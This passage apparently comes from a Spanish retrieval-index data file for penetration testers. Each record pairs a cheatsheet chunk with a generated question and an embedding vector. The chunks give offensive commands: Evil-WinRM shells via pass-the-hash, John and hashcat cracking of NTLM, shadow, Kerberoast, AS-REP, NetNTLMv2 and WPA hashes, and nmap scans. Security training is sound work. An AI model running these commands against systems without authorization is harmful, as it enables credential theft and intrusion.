-0.04783, -0.02861, 0.06364, -0.02245, -0.02342, -0.03631, -0.05642, -0.02355, -0.01144, -0.02793, -0.05366, -0.02961, -0.02979, 0.02857, -0.02422, 0.00082, -0.0013]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Evil-WinRM (shell interactiva Windows)\nevil-winrm -i IP -u USER -p PASS\nevil-winrm -i IP -u USER -H HASH # pass-the-hash\n```", "indexar": "con que puedo montar una sesiΓ³n interactiva en una maquina windows sin contraseΓ±a", "v": [0.12071, 0.0792, -0.19789, -0.19985, -0.13384, -0.09277, -0.20693, -0.02673, -0.08329, -0.16925, -0.00681, -0.04192, 0.07736, -0.04841, 0.00849, 0.11283, 0.10434, -0.00514, 0.07119, 0.02096, 0.02033, -0.0264, -0.04282, -0.05496, 0.04904, 0.03374, 0.07691, -0.04798, -0.0894, -0.05321, 0.00805, 0.01193, 0.09818, 0.02891, -0.02185, -0.04909, -0.01273, 0.06791, 0.18045, 0.02648, -0.02066, 0.13929, -0.12849, 0.13158, 0.08678, 0.01334, 0.06968, -0.01328, 0.01008, 0.06663, -0.06497, -0.04037, -0.02862, -0.00543, -0.0103, -0.13543, 0.18315, -0.03197, 0.06588, -0.00897, -0.05103, 0.14212, -0.06911, 0.08956, -0.03865, -0.01304, 0.05567, -0.00529, 0.03155, 0.16531, -0.05199, -0.10203, -0.04752, 0.00438, 0.05389, -0.02275, 0.00769, -0.06102, 0.0552, 0.09198, -0.04767, 0.04091, 0.07769, 0.00922, -0.11209, -0.01959, 0.00882, -0.05835, 0.09988, -0.098, 0.06887, -0.01437, -0.02977, -0.01627, 0.04005, -0.06714, 0.01843, 0.08463, -0.03493, -0.02915, -0.02196, 0.0151, -0.02798, 0.14916, -0.00281, -0.02761, -0.02327, 0.00491, -0.01537, -0.0675, 0.07902, 0.03443, -0.11239, -0.0905, -0.06008, -0.05077, -0.06876, -0.04447, -0.02282, 0.05958, -0.09823, 0.0042, 0.00604, -0.03117, 0.0037, -0.00316, 0.04004, 0.09472, -0.09498, -0.03309, 0.0138, -0.04157, -0.01761, -0.05438, -0.03706, 0.07571, -0.04342, -0.13544, -0.12979, -0.07269, 0.07831, 0.06009, 0.04421, -0.09282, -0.01426, 0.08689, 0.09813, -0.01394, -0.05297, 0.04287, 0.02933, 0.01161, 0.05798, 0.03531, -0.00627, 0.04917, 0.02796, 0.01692, 0.02758, 0.08778, -0.0295, -0.01682, -0.07325, 0.03544, -0.06226, -0.03031, -0.09825, 0.03335, 0.05407, -0.01789, -0.03325, 0.07001, 0.04758, -0.00655, 0.00404, 0.02934, -0.02109, -0.00246, 0.02471, -0.09265, -0.05004, -0.02352, 0.0027, -0.04566, -0.08545, -0.01569, 0.01911, -0.00374, -0.04694, -0.03407, 0.00343, -0.00024, -0.02495, 0.02588, 0.04069, -0.01469, -0.02393, 0.00652, 0.01526, -0.01219, 0.01001, 0.02915, -0.01001, -0.01745, 0.06094, 0.01519, -0.06061, 0.01882, 0.04532, -0.01654, 0.0129, 0.02047, 0.02002, -0.04864, 0.00305, -0.0439, 0.00758, 0.01198, -0.08982, 0.02405, 0.06724, 0.04807, 0.05094, 0.05393, 0.02504, -0.02227, -0.05923, 0.03099, 0.02448, -0.00146, -0.05064, 0.02193, 0.00753, 0.04541, 0.0991, -0.013, -0.02573, -0.0363, -0.02251, 0.01966, -0.03497, 0.04508, 0.03175, -0.06768, -0.02859, -0.00665, -0.04436, 0.00331, 0.00642, -0.03169, -0.07059, -0.01092, -0.01101, -0.00622, -0.03916, -0.00286]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Evil-WinRM (shell interactiva Windows)\nevil-winrm -i IP -u USER -p PASS\nevil-winrm -i IP -u USER -H HASH # pass-the-hash\n```", "indexar": "cual es una alternativa libre para el acceso remoto por shell en windows", "v": [0.01639, -0.01462, -0.08147, -0.11192, -0.10385, -0.05485, -0.1084, -0.12885, -0.05217, -0.02582, -0.09461, -0.25967, -0.01794, -0.01589, 0.08567, -0.02358, 0.00209, -0.04664, 0.0802, 0.04066, -0.08307, -0.00602, -0.10709, -0.02081, -0.05103, -0.04094, 0.05173, 0.08926, -0.05726, -0.01781, 0.05436, -0.13657, 0.02185, -0.0023, 0.00956, 0.02904, 0.13267, 0.16146, 0.12741, 0.00846, 0.05387, -0.02119, -0.11852, 0.11264, 0.13058, -0.09486, 0.03372, -0.00765, 0.03811, 0.05031, -0.11158, -0.03217, -0.09116, 0.02835, 0.16563, 0.04144, 0.22304, -0.09982, -0.01459, 0.02369, -0.14429, 0.0713, 0.0008, -0.0098, 0.01171, -0.04715, -0.07155, -0.02231, -0.05348, 0.14443, -0.00467, -0.12123, 0.03264, -0.02522, -0.11703, 0.03648, -0.15188, -0.05796, 0.05102, -0.00652, -0.00693, -0.03101, 0.00287, 0.00454, -0.08824, -0.17563, 0.0839, -0.06466, 0.00078, -0.03006, 0.11094, -0.04556, -0.05565, 0.15257, 0.03225, -0.09267, -0.06768, 0.02925, -0.07712, -0.00338, -0.007, 0.00201, -0.07939, 0.05259, -0.00178, -0.00553, -0.05579, 0.01319, -0.12205, 0.05219, -0.00267, 0.05224, -0.05675, 0.00519, -0.03409, -0.0488, -0.05763, -0.03292, 0.03627, 0.01617, -0.03638, -0.0365, -0.10334, -0.03536, -0.0054, 0.00636, 0.00963, 0.05216, -0.10558, 0.05457, 0.09534, -0.00503, -0.05529, -0.08855, -0.08513, 0.03597, -0.00987, -0.05977, 0.02802, -0.0734, 0.02719, 0.03192, 0.01516, 0.02921, -0.00973, -0.02131, -0.00894, 0.05436, -0.02413, -0.05428, -0.02001, -0.00845, -0.03912, 0.10706, -0.05717, 0.01786, -0.04715, 0.07744, -0.03484, 0.05545, 0.01401, -0.01958, -0.01448, 0.00923, 0.00275, -0.05745, -0.0252, -0.04263, -0.02683, 0.00925, -0.043, 0.11476, 0.03623, -0.03592, -0.00743, -0.04142, 0.02332, -0.09375, -0.01614, -0.05444, -0.00167, 0.0389, -0.06642, -0.05869, 0.01713, 0.02872, -0.00062, 0.01421, -0.02754, 0.00664, -0.06602, -0.01234, -0.04408, -0.05957, 0.01243, 0.02165, -0.0283, -0.13181, 0.02502, 0.05158, -0.06045, 0.00456, 0.02096, -0.07674, 0.04684, -0.00206, -0.02559, 0.05947, 0.03892, 0.05656, 0.02628, 0.01357, 0.04968, 0.04465, -0.02371, -0.00213, 0.03943, -0.01252, -0.01456, 0.00416, 0.04849, 0.01912, 0.01371, 0.03184, 0.02156, 0.00907, -0.0299, 0.02724, -0.03855, -0.05962, -0.01145, -0.0066, 0.04113, 0.01345, 0.00815, -0.03673, -0.0135, -0.03431, 0.02958, 0.02411, -0.019, 0.06331, -0.0232, -0.01836, -0.0621, 0.00842, -0.10253, -0.00136, -0.04536, -0.05443, -0.05223, 0.01087, -0.02719, 0.00837, 0.00207, 0.03491]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# John\njohn --wordlist=WL hashes.txt\njohn --wordlist=WL --format=NT hashes.txt\nzip2john fichero.zip > hash; john hash\nssh2john id_rsa > hash; john --wordlist=WL hash", "indexar": "con que programa puedo hacer crack de contraseΓ±as con hash de texto plano?", "v": [0.09898, -0.01826, -0.14281, -0.19729, 0.01309, -0.15252, 0.03873, -0.00465, -0.05188, 0.03979, -0.01444, 0.04887, -0.03545, -0.13172, 0.02808, 0.09557, 0.08522, 0.06063, 0.07688, 0.08618, -0.0202, -0.11822, -0.15396, 0.02023, -0.04044, -0.12146, -0.06485, 0.07814, -0.18058, -0.07042, -0.06003, -0.0263, 0.05048, -0.01209, -0.00408, 0.15706, 0.06187, 0.13022, 0.10719, 0.10288, -0.00433, 0.0562, -0.11393, 0.05418, -0.00959, -0.05363, 0.05979, 0.0268, 0.04457, -0.05955, -0.00049, -0.08438, -0.10408, -0.03487, -0.03765, -0.0699, 0.11883, -0.0194, -0.13552, -0.00204, -0.04334, 0.08512, 0.02732, 0.00835, -0.10095, -0.00377, 0.08123, 0.06682, -0.04743, 0.10538, 0.03054, 0.02562, 0.0164, -0.01788, 0.0214, 0.03968, -0.03007, -0.08635, 0.01504, 0.08568, -0.07326, -0.00018, 0.07349, 0.07035, -0.15123, 0.04299, -0.00522, 0.00939, 0.09798, 0.00502, -0.00814, 0.02248, 0.01744, 0.10347, 0.01618, -0.08744, 0.1318, 0.00856, -0.06364, 0.05525, 0.0148, -0.10497, -0.07827, 0.1447, -0.05063, 0.04458, 0.03098, 0.04091, -0.01563, 0.03168, 0.06026, 0.00837, -0.08087, -0.03014, -0.06615, -0.04081, -0.04423, -0.02142, 0.04331, -0.04396, -0.13944, 0.01584, -0.04335, 0.07076, 0.1441, 0.04982, 0.00081, 0.11242, -0.10061, -0.02696, 0.02137, 0.0164, -0.02861, -0.04843, -0.04539, 0.01329, 0.06685, -0.0564, -0.0398, -0.0123, -0.04986, 0.07946, 0.00555, 0.06247, 0.03131, -0.00359, -0.02061, -0.01945, 0.01321, 0.01371, -0.00579, 0.07301, 0.04827, 0.0377, -0.07346, 0.01078, 0.00724, -0.03699, -0.03429, 0.09703, -0.06716, -0.01413, -0.1022, 0.03486, 0.00929, 0.01927, 0.01953, 0.01174, 0.05412, 0.10807, -0.02028, 0.04979, 0.08825, -0.04752, 0.01723, -0.01002, 0.02921, -0.03639, -0.05042, -0.06663, -0.03486, -0.00979, 0.0114, 0.03027, -0.02277, -0.05598, 0.04535, 0.05746, -0.00955, -0.06042, 0.00204, -0.00535, -0.01564, 0.06551, 0.01833, -0.03153, -0.0062, 0.02486, 0.00224, -0.08855, -0.01975, -0.02545, 0.04102, -0.05362, 0.0503, 0.08397, -0.05606, -0.05664, -0.01353, 0.14448, 0.05793, -0.02592, 0.03233, -0.00722, -0.08377, 0.00451, -0.03128, 0.07274, 0.04486, 0.02786, 0.03719, 0.05583, 0.07435, 0.05695, 0.00909, -0.1057, -0.01577, 0.07087, 0.03784, 0.05893, 0.00532, 0.01142, -0.01328, -0.00524, 0.05876, 0.00016, -0.06993, -0.03878, -0.02558, -0.06032, -0.05412, 0.05512, 0.0378, -0.02741, -0.05552, 0.00955, -0.05893, 0.03403, 0.00062, -0.00676, -0.04277, 0.02288, 0.04054, -0.02589, 0.02594, -0.02571]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# John\njohn --wordlist=WL hashes.txt\njohn --wordlist=WL --format=NT hashes.txt\nzip2john fichero.zip > hash; john hash\nssh2john id_rsa > hash; john --wordlist=WL hash", "indexar": "cual es la herramienta para descomprimir hashes y crucear una lista de palabras?", "v": [0.09358, -0.07378, -0.06058, -0.07167, -0.00539, -0.24555, -0.01467, 0.00773, -0.0275, -0.02559, -0.06448, -0.01431, 0.04075, -0.04347, 0.09951, -0.00247, 0.10112, 0.03324, 0.02, 0.06028, -0.0263, -0.00782, -0.15866, 0.01175, -0.17776, -0.18946, -0.0477, 0.00879, -0.19332, 0.02592, -0.04008, 0.01521, -0.01437, -0.05947, -0.01669, 0.05802, -0.05553, 0.09855, -0.00448, 0.12525, -0.04439, 0.08994, -0.04692, 0.05195, -0.10538, -0.12369, -0.05886, 0.05546, -0.00664, -0.0352, -0.02251, -0.11449, -0.1563, -0.00538, -0.02313, -0.14436, 0.15282, 0.00906, -0.115, -0.13929, -0.07527, 0.0303, -0.08506, -0.08392, -0.0919, 0.02775, -0.0322, -0.00481, -0.07095, 0.12342, 0.0693, 0.03601, 0.0449, -0.04615, 0.05822, 0.05592, 0.0226, 0.08589, 0.008, 0.02193, 0.11124, -0.09298, -0.05517, 0.00553, -0.01579, -0.02585, 0.07952, 0.03909, 0.06393, -0.00151, -0.02467, 0.02772, -0.04077, 0.03069, 0.07853, -0.05689, -0.01333, 0.02884, -0.00994, -0.02101, 0.14298, -0.02656, -0.12077, 0.05446, -0.03611, -0.01713, 0.00673, 0.06566, -0.05522, -0.06562, 0.1484, -0.07411, 0.06255, -0.01119, -0.03485, -0.01185, -0.03524, -0.04985, -0.01735, -0.10832, 0.02995, 0.03287, -0.08, 0.03507, 0.06781, 0.03117, -0.04709, 0.02672, -0.05679, -0.07695, 0.0202, 0.04119, -0.04943, -0.07078, -0.01889, -0.00701, 0.0548, -0.11079, 0.04772, -0.08494, 0.03254, -0.00756, -0.07826, -0.0562, 0.05624, -0.01459, 0.03136, 0.04949, -0.09223, 0.0087, 0.02057, -0.01619, 0.05302, 0.05047, 0.01247, -0.00511, -0.0019, 0.04495, -0.05413, 0.04472, -0.0848, -0.12006, 0.04172, 0.00601, 0.00811, -0.01098, 0.02568, 0.0833, 0.04658, 0.06302, 0.02948, -0.04352, 0.1195, 0.01511, -0.01897, -0.02614, -0.0578, 0.04549, -0.01962, -0.11982, -0.03747, -0.03859, -0.09266, -0.03596, 0.04317, -0.01495, 0.04772, -0.0086, -0.01284, -0.00066, -0.04125, 0.00365, -0.0685, -0.06671, 0.07019, 0.05469, 0.0274, -0.02061, 0.03198, -0.11478, -0.01401, -0.03354, 0.00546, -0.00933, 0.00159, 0.07395, -0.01829, -0.0614, -0.00105, 0.0219, 0.02899, 0.09129, -0.04955, 0.04797, -0.0401, -0.05484, -0.04215, 0.04417, 0.00589, -0.01363, 0.05566, 0.04953, 0.06333, -0.00634, -0.02741, 0.0338, -0.04307, 0.04974, 0.04221, -0.03309, -0.0073, -0.03754, -0.01649, -0.03822, -0.01306, -0.03081, -0.00989, 0.00767, 0.00086, -0.05021, 0.01399, 0.05845, -0.0295, -0.04759, -0.05504, -0.01725, 0.01007, -0.03838, -0.02301, -0.0335, -0.06271, 0.016, 0.02772, -0.00041, 0.08433, -0.05429]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# John\njohn --wordlist=WL hashes.txt\njohn --wordlist=WL --format=NT hashes.txt\nzip2john fichero.zip > hash; john hash\nssh2john id_rsa > hash; john --wordlist=WL hash", "indexar": "que software sirve para recuperar contraseΓ±as encriptadas en archivos zip?", "v": [0.0367, -0.12559, -0.13173, -0.20818, 0.00802, -0.26198, -0.06879, -0.01983, -0.03104, -0.04339, 0.00574, -0.11316, 0.00909, -0.04072, 0.08116, -0.05552, 0.06351, -0.06089, 0.11489, 0.06411, 0.02114, -0.05794, 0.00901, -0.10097, -0.06405, -0.02043, 0.00563, 0.10958, -0.13336, 0.03667, 0.00364, -0.02398, 0.1011, 0.04786, -0.06963, 0.14253, 0.05388, 0.06717, -0.07599, 0.13698, 0.10887, 0.04838, -0.08419, 0.07789, 0.00172, -0.0555, 0.03777, 0.04373, 0.10317, -0.04557, -0.081, -0.15385, -0.09035, -0.05267, -0.0071, -0.09837, -0.01109, -0.04426, -0.01553, -0.01447, -0.13433, 0.13577, 0.04995, 0.06554, -0.05529, -0.10263, -0.02424, 0.00116, -0.17459, 0.11858, 0.03101, 0.11289, -0.00621, 0.01414, -0.01261, -0.01844, 0.00821, -0.02364, -0.01567, 0.13445, -0.0339, -0.01724, 0.00251, 0.0059, -0.14771, -0.03087, 0.02879, 0.07068, 0.05571, -0.0443, 0.03984, 0.00586, -0.03043, 0.09291, 0.00902, -0.04088, 0.00607, 0.0344, -0.09185, 0.02615, -0.06604, -0.00117, 0.00678, 0.10035, -0.04292, 0.05405, 0.00941, 0.0522, 0.01833, -0.09346, 0.04539, 0.08001, 0.01286, 0.00776, -0.0758, -0.02692, 0.03091, -0.08774, 0.07589, 0.00606, 0.04321, -0.02258, -0.04486, 0.02343, -0.02816, 0.05396, 0.02652, 0.04892, -0.07766, -0.08437, 0.01734, -0.04671, -0.0849, 0.0578, -0.07631, 0.05375, 0.08069, -0.02276, -0.04833, 0.01253, 0.04817, 0.06679, 0.00751, 0.0278, 0.08345, 0.06936, 0.04916, -0.0364, -0.00654, -0.05141, 0.00231, 0.0303, 0.01889, -0.01546, -0.06792, 0.00875, -0.02497, -0.13947, -0.08431, 0.1032, -0.07452, 0.00082, -0.07066, 0.0228, -0.06365, -0.03864, 0.03245, 0.10403, 0.03185, -0.00812, 0.02498, 0.03719, 0.01726, -0.09699, -0.01928, 0.00228, 0.01173, -0.05698, 0.00542, -0.1181, 0.02588, -0.06027, 0.01738, 0.02846, 0.0278, -0.02798, 0.07227, 0.0102, -0.07293, -0.03617, 0.00987, -0.04937, -0.07967, 0.0102, -0.04948, 0.0188, -0.05576, 0.03782, 0.00197, -0.0294, -0.02395, -0.00333, -0.08247, 0.01901, 0.07472, 0.00941, -0.03808, -0.04417, -0.02423, -0.00742, -0.00704, 0.0104, 0.02832, -0.01454, -0.04145, -0.07808, 0.00365, 0.08072, -0.03687, -0.01546, 0.01569, -0.00152, 0.07099, 0.0388, 0.01865, -0.06981, 0.00749, 0.02807, 0.00837, -0.03182, -0.02857, 0.06079, -0.04389, 0.05437, 0.04963, -0.04019, -0.0735, -0.04084, 0.00188, -0.05598, -0.06062, 0.0676, 0.00429, -0.08648, -0.05178, -0.03151, -0.00348, -0.00327, 0.05618, 0.0031, -0.05005, 0.05401, 0.01465, -0.00562, -0.01268, 0.00035]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Hashcat (modo -m)\nhashcat -m 1000 hashes.txt WL # NTLM\nhashcat -m 0 hashes.txt WL # MD5\nhashcat -m 100 hashes.txt WL # SHA1\nhashcat -m 1800 hashes.txt WL # sha512crypt (/etc/shadow $6$)\nhashcat -m 13100 hashes.txt WL # Kerberoast (TGS)\nhashcat -m 18200 hashes.txt WL # AS-REP\nhashcat -m 5600 hashes.txt WL # NetNTLMv2 (Responder)\nhashcat -m 22000 hash.hc22000 WL # WPA/WPA2\n```", "indexar": "que programa sirve para romper contraseΓ±as NTLM y MD5?", "v": [-0.01569, -0.08085, -0.10296, -0.19658, -0.07503, -0.00077, -0.08832, 0.11283, -0.09129, 0.01763, 0.01302, 0.01811, 0.21083, -0.20936, -0.11441, -0.01505, 0.00682, -0.12942, 0.09899, 0.13411, -0.04482, -0.05093, -0.00935, -0.09249, 0.03781, 0.00878, 0.01422, -0.04137, -0.07147, -0.02214, -0.03091, -0.09456, -0.03281, 0.00682, 0.0484, 0.03253, 0.05219, 0.03091, -0.01598, 0.12883, 0.14418, 0.10774, -0.07677, 0.07711, 0.09749, -0.05365, 0.01492, -0.0158, 0.14199, -0.03964, -0.08058, 0.05695, -0.01688, -0.04922, -0.01419, -0.02689, 0.06534, 0.00341, -0.03465, 0.10238, -0.08541, 0.00806, 0.02683, -0.10314, -0.10951, -0.06811, 0.07988, -0.00599, -0.05915, 0.05196, -0.13713, 0.01739, 0.03698, -0.08555, -0.04691, 0.07335, -0.01191, -0.05995, 0.06645, 0.09393, -0.01368, 0.00856, -0.04197, 0.03256, -0.11921, 0.00018, 0.05881, -0.01624, 0.00962, -0.04811, 0.04159, 0.07055, -0.02357, 0.01942, 0.06956, -0.1277, 0.10119, -0.01029, 0.03911, 0.02729, 0.07117, -0.01685, -0.0355, 0.1102, -0.11478, 0.02451, 0.05156, -0.01564, 0.0098, 0.03438, 0.09233, 0.0327, -0.07381, -0.0548, -0.07489, 0.01884, -0.05264, -0.05523, 0.012, -0.00499, -0.04668, 0.05642, -0.01828, 0.0799, 0.04801, 0.06295, -0.03124, 0.11147, -0.07472, 0.02767, 0.0272, -0.05158, -0.08419, 0.00309, -0.03648, -0.04461, 0.00346, -0.06267, -0.07476, -0.04246, 0.04975, -0.00372, 0.03027, 0.10158, 0.04211, 0.04687, 0.09127, -0.06695, 0.06914, 0.03028, 0.03223, 0.01986, -0.05829, 0.01307, -0.04144, 0.00362, -0.0167, -0.0688, -0.12246, 0.13555, 0.00761, 0.04477, -0.00082, -0.00377, 0.01045, -0.04502, 0.04914, 0.03757, 0.12376, 0.11427, 0.04974, 0.08336, 0.0227, -0.05836, -0.00713, -0.00643, 0.05371, -0.11694, -0.0288, -0.08996, -0.01387, 0.02609, 0.04632, -0.00733, 0.05036, -0.05926, 0.02199, -0.03171, -0.04557, -0.10214, 0.00505, 0.01011, -0.06334, 0.01698, 0.01118, 0.00293, -0.00893, -0.00385, 0.04156, -0.03064, -0.05707, 0.00496, -0.01635, -0.05684, 0.03762, 0.09742, -0.03345, -0.04487, 0.0029, 0.07351, 0.0506, -0.02235, 0.0315, 0.00559, -0.09678, -0.08125, -0.00932, 0.00238, 0.01606, 0.03225, -0.02089, 0.02387, 0.03504, 0.0339, 0.06429, -0.1012, -0.01789, 0.00833, 0.04837, 0.01752, -0.0266, -0.01384, -0.00087, 0.00063, 0.06376, 0.02424, -0.02058, -0.03419, 0.00441, -0.06417, -0.04338, 0.05009, -0.0063, -0.12266, -0.01205, 0.05067, -0.05375, 0.00481, -0.00266, 0.04874, -0.07586, 0.02923, 0.03061, -0.00569, -0.00528, 0.00959]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Hashcat (modo -m)\nhashcat -m 1000 hashes.txt WL # NTLM\nhashcat -m 0 hashes.txt WL # MD5\nhashcat -m 100 hashes.txt WL # SHA1\nhashcat -m 1800 hashes.txt WL # sha512crypt (/etc/shadow $6$)\nhashcat -m 13100 hashes.txt WL # Kerberoast (TGS)\nhashcat -m 18200 hashes.txt WL # AS-REP\nhashcat -m 5600 hashes.txt WL # NetNTLMv2 (Responder)\nhashcat -m 22000 hash.hc22000 WL # WPA/WPA2\n```", "indexar": "con que puedo atacar hashes de tipo Kerberoast o AS-REP?", "v": [-0.02789, -0.13242, 0.00163, 0.00229, 0.05707, -0.04562, 0.03296, 0.11674, -0.12532, 0.11499, -0.0913, -0.04557, -0.09823, 0.01267, 0.39401, 0.0511, -0.15889, 0.14077, 0.0869, 0.16229, 0.15612, 0.01959, -0.11621, 0.07845, 0.05818, 0.04546, -0.03806, 0.094, -0.13758, -0.03466, -0.08425, 0.05882, -0.09264, 0.04961, -0.06006, 0.06646, -0.0907, 0.11739, 0.13319, 0.16482, -0.01177, 0.09059, -0.10686, 0.02156, -0.01683, -0.03122, -0.04712, -0.01982, -0.01065, 0.01708, 0.10517, 0.00738, -0.19112, -0.04458, -0.00678, -0.01198, 0.05222, -0.02466, -0.1206, -0.03925, -0.02188, -0.0044, 0.00403, -0.05325, 0.03376, -0.12229, -0.02091, -0.02574, -0.00858, 0.00051, -0.08866, 0.11839, 0.02319, 0.01991, 0.01048, 0.05907, 0.00161, 0.0049, 0.08696, 0.06503, -0.02917, -0.06196, 0.00036, 0.09442, 0.00503, -0.07574, 0.02517, -0.09721, 0.0146, -0.11002, 0.01684, 0.0127, 0.03644, 0.03733, -0.09354, -0.04048, -0.05472, 0.03269, -0.10462, -0.06869, -0.08037, 0.01237, -0.10452, 0.01138, -0.00975, -0.00718, 0.00564, -0.00037, 0.12744, -0.05979, 0.02608, -0.02166, -0.03816, -0.07212, 0.01578, -0.01934, -0.06314, 0.02316, 0.04376, 0.01913, -0.06503, 0.02802, 0.0232, 0.10577, 0.05526, 0.01419, 0.04688, 0.00331, -0.03968, -0.06765, -0.0099, 0.07959, 0.05646, 0.02675, 0.03892, 0.0366, -0.01592, -0.02221, -0.03982, 0.01975, 0.04694, 0.12452, -0.007, 0.02494, -0.04105, 0.0276, 0.00801, 0.01914, -0.06585, -0.02412, 0.01881, 0.00516, 0.06426, 0.07023, -0.05907, -0.05212, 0.01861, -0.00966, -0.00914, 0.13475, -0.06274, 0.00938, -0.04547, 0.02302, 0.02569, 0.05982, 0.03307, -0.05525, 0.04742, 0.02769, -0.00989, -0.00994, 0.04931, 0.00599, 0.03135, -0.00066, 0.01259, 0.00196, -0.01473, 0.00479, -0.00136, -0.04917, 0.00062, 0.0633, -0.05899, -0.0155, -0.02964, 0.06273, 0.03122, -0.00739, 0.02623, 0.0185, 0.05568, 0.02848, -0.00992, -0.03076, 0.03921, 0.04501, -0.03937, 0.01947, -0.04122, 0.00036, -0.02798, -0.06351, 0.01463, 0.02657, -0.01909, -0.02079, -0.00555, 0.00064, -0.00864, 0.01233, 0.06622, -0.02258, -0.0515, 0.01985, 0.01535, -0.00782, -0.00515, 0.04098, 0.06021, 0.04232, 0.07427, 0.00821, -0.02429, 0.0491, -0.0486, -0.03163, -0.01171, -0.01469, -0.00363, 0.00365, -0.01525, -0.03309, -0.02727, -0.01728, -0.04677, 0.02877, -0.02779, 0.0616, -0.00689, -0.02856, -0.01963, 0.02445, 0.01711, -0.04487, -0.07125, -0.03231, -0.00251, -0.02645, -0.04432, 0.04346, -0.0337, -0.00407, 0.0395, -0.01851]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Hashcat (modo -m)\nhashcat -m 1000 hashes.txt WL # NTLM\nhashcat -m 0 hashes.txt WL # MD5\nhashcat -m 100 hashes.txt WL # SHA1\nhashcat -m 1800 hashes.txt WL # sha512crypt (/etc/shadow $6$)\nhashcat -m 13100 hashes.txt WL # Kerberoast (TGS)\nhashcat -m 18200 hashes.txt WL # AS-REP\nhashcat -m 5600 hashes.txt WL # NetNTLMv2 (Responder)\nhashcat -m 22000 hash.hc22000 WL # WPA/WPA2\n```", "indexar": "cual es una herramienta para desbloquear contraseΓ±as cifradas con WPA/WPA2?", "v": [0.20628, 0.01892, -0.10485, -0.10713, 0.02903, -0.10938, 0.05189, -0.1497, -0.12116, -0.0246, 0.02655, -0.06648, -0.11108, -0.06526, -0.00139, -0.01763, -0.0766, -0.06302, 0.05011, 0.02647, 0.0412, 0.003, -0.1172, 0.02569, -0.09505, -0.03815, 0.03558, 0.01236, -0.21786, 0.01236, 0.02019, -0.07257, 0.07651, 0.01505, 0.02097, 0.16536, -0.01918, 0.10439, 0.14638, 0.10323, -0.00214, 0.0595, 0.03221, 0.04912, 0.07074, 0.0176, 0.02778, 0.08147, 0.07171, 0.05758, -0.15284, -0.08138, -0.0356, -0.12742, 0.01532, -0.11259, 0.27472, -0.00428, -0.05781, -0.03156, -0.03261, 0.04602, -0.06677, -0.02551, -0.05374, -0.12863, 0.03332, -0.12922, -0.01788, 0.06288, 0.00019, 0.01262, -0.02033, 0.02933, 0.05723, 0.01135, -0.03391, -0.05384, 0.08203, 0.07885, 0.00695, -0.10084, 0.06165, 0.0074, -0.08669, 0.01274, 0.05205, 0.04482, 0.10159, -0.04886, 0.01538, 0.08326, -0.02181, 0.03583, 0.0125, -0.08492, 0.04801, 0.05093, -0.01534, 0.02816, 0.03428, 0.01957, -0.07747, 0.06356, -0.00103, 0.00915, 0.03834, 0.04399, -0.00602, -0.05079, 0.06979, -0.00832, -0.10835, -0.02902, -0.03966, 0.01011, 0.03746, -0.01858, 0.02289, -0.10702, -0.04054, 0.06952, -0.08203, 0.01446, -0.01349, 0.11484, -0.04739, 0.05444, -0.01237, -0.09494, -0.01002, -0.01194, 0.01466, 0.07678, -0.08065, 0.01238, -0.00578, -0.14535, -0.01488, 0.08299, 0.04087, -0.057, -0.0132, -0.0394, 0.11652, 0.01154, 0.08787, 0.01194, -0.09098, 0.00982, 0.03839, -0.00974, -0.00532, 0.01827, -0.08925, 0.03323, -0.08227, -0.00531, -0.08825, 0.06393, -0.03122, -0.08028, 0.00889, 0.01511, -0.02387, -0.01059, 0.04478, -0.03157, 0.01472, -0.07738, 0.0251, 0.03556, 0.03701, 0.06683, 0.00011, -0.07492, 0.01809, -0.03511, 0.00604, -0.09511, -0.0423, -0.01628, 0.00083, -0.01966, 0.01083, -0.06796, 0.03574, -0.02333, -0.03978, 0.08107, 0.01973, 0.0308, -0.00347, -0.01574, 0.00654, 0.00311, 0.01863, -0.06671, 0.0181, -0.10326, -0.05174, -0.03221, -0.05322, -0.04132, 0.01195, 0.03065, -0.06332, -0.04857, -0.0301, 0.01824, 0.03648, 0.01059, 0.0564, -0.05187, -0.08923, 0.00039, -0.06994, 0.01618, -0.0074, 0.06583, 0.03562, 0.06065, 0.00808, 0.02105, -0.0041, -0.00638, -0.03906, 0.0401, 0.01333, 0.01129, -0.00053, 0.01724, 0.04741, 0.0097, 0.09553, 0.01952, -0.05302, -0.10534, -0.01229, 0.02175, -0.00831, 0.02934, 0.02371, -0.07455, -0.05151, -0.07566, -0.03048, 0.00911, -0.00614, -0.04439, -0.05004, 0.03717, 0.07635, 0.04172, 0.04407, -0.04037]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Recon de red (nmap, comun)\n\n```bash\nnmap -sn 10.0.0.0/24 # hosts vivos\nnmap -p- --min-rate 5000 IP # todos los puertos, rapido\nnmap -sV -sC -p 22,80,443 IP # version + scripts\nnmap -sU --top-ports 20 IP # UDP\nnmap --script 